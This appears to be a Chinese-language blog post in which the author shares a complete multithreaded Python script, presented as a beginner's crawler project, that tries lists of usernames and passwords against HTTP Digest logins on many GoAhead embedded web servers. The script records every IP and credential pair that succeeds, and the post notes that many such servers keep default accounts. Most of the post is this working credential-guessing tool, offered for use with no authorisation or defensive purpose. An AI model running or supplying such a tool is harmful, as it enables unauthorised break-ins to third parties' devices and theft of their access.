最近在學慣用python寫爬蟲工具,某天偶然發現GoAhead系列伺服器的登錄方式跟大多數網站不一樣,不是採用POST等方法,通過查找資料發現GoAhead是一個開源(商業許可)、簡單、輕巧、功能強大、可以在多個平臺運行的嵌入式Web Server。大多數GoAhead伺服器採用了HTTP Dige ...
最近在學慣用python寫爬蟲工具,某天偶然發現GoAhead系列伺服器的登錄方式跟大多數網站不一樣,不是採用POST等方法,通過查找資料發現GoAhead是一個開源(商業許可)、簡單、輕巧、功能強大、可以在多個平臺運行的嵌入式Web Server。大多數GoAhead伺服器採用了HTTP Digest認證方式,並且部分伺服器採用了預設賬號密碼,於是萌生了針對GoAhead編寫爬蟲的想法,通過近8個小時的編程與調試,勉強寫出了個簡陋的腳本,現在拿出來分享,給剛接觸python的新手參考下,也請求路過的大神指點下,哈哈。
該腳本對新手來說難點在於如何讓python自動填寫賬號密碼並登錄,本人花了近兩個小時參考了很多網站,覺得用python的第三方模塊requests中的get()函數最方便,只需填寫URL、認證方式和賬號密碼即可模擬登錄。
另一個難點就是多線程了,不過對於用其它語言寫過多線程的人來說還是挺容易的,不懂的可以自己查資料,這裡就不多說了。
下麵附上完整代碼:
from requests.auth import HTTPDigestAuth import requests import threading import sys import os import time ip_file_name = 'ip.txt' password_file_name = 'password.txt' results_file_name = 'results.txt' ip_count = 0 thread_count = 0 default_thread_count = 150 local = threading.local() #read ip_file def get_ip(): if os.path.exists(os.getcwd() + '/' + ip_file_name): with open(ip_file_name, 'r') as r: list = [] for line in r.readlines(): line = line.strip('\n') line = 'http://' + line list.append(line) r.close() return list else: print('ip file doesn\'t exist!\n') os._exit(-1) #read password_file def get_password(): if os.path.exists(os.getcwd() + '/' + password_file_name): with open(password_file_name, 'r') as pa: list = [] for line in pa.readlines(): line = line.strip('\n') list.append(line) pa.close() return list else: print('password file doesn\'t exist!\n') os._exit(-1) class MyThread(threading.Thread): def __init__(self, thread_index, ip_list, pass_list, results_file): threading.Thread.__init__(self) self.thread_index = thread_index self.ip_list = ip_list self.pass_list = pass_list self.results_file = results_file def run(self): local.thread_index = self.thread_index #Calculate the number of tasks assigned. if ip_count <= default_thread_count: local.my_number = 1 else: local.my_number = (int)(ip_count/thread_count) if ip_count%thread_count > thread_index: local.my_number = local.my_number + 1 for local.times in range(local.my_number): try: local.ip = self.ip_list[(local.times-1)*thread_count+local.thread_index] #Check whether the target is a digest authentication. local.headers = str(requests.get(local.ip, timeout=6).headers) if 'Digest' not in local.headers: continue except BaseException: ''' e = sys.exc_info() print(e) ''' continue #Loop to submit account password. for local.user in self.pass_list: #sleep 0.1 second to prevent overloading of target time.sleep(0.1) #Get the account password by cutting local.user local.colon_index = local.user.find(':') if local.colon_index == -1: print(local.user+' doesn\'t Conform to the specifications') os._exit(1) local.username = local.user[0:local.colon_index] local.password = local.user[local.colon_index+1:] if local.password == '<empty>': local.password = '' try: local.timeouts = 0 #Start Digest authentication local.code = requests.get( local.ip, auth=HTTPDigestAuth(local.username, local.password), timeout=5 ) #If the status code is 200,the login is success if local.code.status_code == 200 : print('login '+local.ip+' success!') self.results_file.writelines(local.ip+' '+local.username+' '+local.password+'\n') break except BaseException: ''' e = sys.exc_info() print(str(local.thread_index)+' '+local.ip+' '+local.username+' '+local.password) print(e) ''' #If the times of timeout is too many, check the next IP. local.timeouts += 1 if local.timeouts == 15: local.timeouts = 0 break else: continue if __name__ == '__main__': ip_list = get_ip() pass_list = get_password() if len(ip_list)==0 or len(pass_list)==0: print('please fill ip, username or password file') os._exit(-1) ip_count = len(ip_list) if ip_count <= default_thread_count: thread_count = ip_count else: thread_count = default_thread_count print('start to work...') #create threads and run threads = [] with open(results_file_name, mode='a') as results_file: for thread_index in range(thread_count): thread = MyThread(thread_index, ip_list, pass_list, results_file) thread.start() threads.append(thread) for thread in threads: #wait for all threads to end thread.join() results_file.close() print('All work has been completed.')
該腳本的運行流程為:
1.讀取ip.txt、password.txt文件中的內容
2.創建線程並運行
3.每個線程對其分配到的IP進行迴圈認證,先檢查目標是否存在且為Digest認證方式,若為真則開始迴圈登錄,登錄過程中若多次超時則跳過對該IP的檢查
4.當伺服器返回200狀態碼時則表示登錄成功,將IP和賬號密碼寫入results.txt,並迴圈檢查下一個IP
5.當所有線程將分配到的所有IP檢查完畢,則程式運行完畢